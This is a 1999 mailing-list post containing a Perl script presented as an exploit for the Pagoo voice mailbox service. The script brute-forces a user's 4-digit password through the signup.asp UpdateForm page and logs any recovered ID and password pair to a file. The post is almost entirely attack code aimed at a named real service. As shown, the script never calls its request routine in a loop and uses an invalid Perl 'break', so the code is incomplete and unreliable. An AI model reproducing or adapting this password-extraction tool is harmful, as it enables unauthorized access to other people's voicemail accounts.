hhp: Pagoo VMB remote exploit.

From: Elaich Of Hhp (hhpat_private)
Date: Tue Jun 22 1999 - 10:06:05 PDT

    #!/usr/bin/perl
    #
    #       (hhp) hhp-pagoo.pl (hhp)
    #        by: elaich of the hhp.
    #         http://hhp.hemp.net/
    #                 '99'
    #
    # The (Pagoo Internet voice MailBox) exploit.
    # Available at http://www.pagoo.com/
    #
    # This exploit will extract the password to
    # the specified PagooID you specify.
    #
    # The vulnerability comes into play when you
    # connect to your UpdateForm thru signup.asp
    # which  requires  your  PagooID  and your 4
    # digit password.
    #
    # Nothing will prevent you from reconnecting
    # and trying  a  new  password from 0000  in
    # increments  of  1 till we reach 9999 which
    # is  the  highest  password  possible...  I
    # could  call  this  a  brute, but it always
    # 100%  of  the  time  will  get  the passwd
    # unlike a brute.
    #
    # Logs passwds to file: pagooids

    use IO::Socket;

    die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
    ($box) = (@ARGV);

    open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
    autoflush OUT 1;

    $host = "www.pagoo.com";
    autoflush STDOUT 1;

    sub parse
     {
      ($num) = @_;
      $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";

      $socket = IO::Socket::INET->new(PeerAddr => $host,
                                      PeerPort => 80,
                                         Proto => "tcp") or die "Can't connect.\n";

      print $socket "GET $url\n";
      print "Trying password: $num of 9999.\n";
      while(<$socket>)
       {
            chomp;
            if(/Password invalid/)
             {
             break;
             }
            if(/First Name/)
             {
              print "PagooID password extracted...\n";
              print "PagooID: $box / Password: $num\n";
              print OUT "PagooID: $box / Password: $num\n";
              exit 0;
             }

        }
     }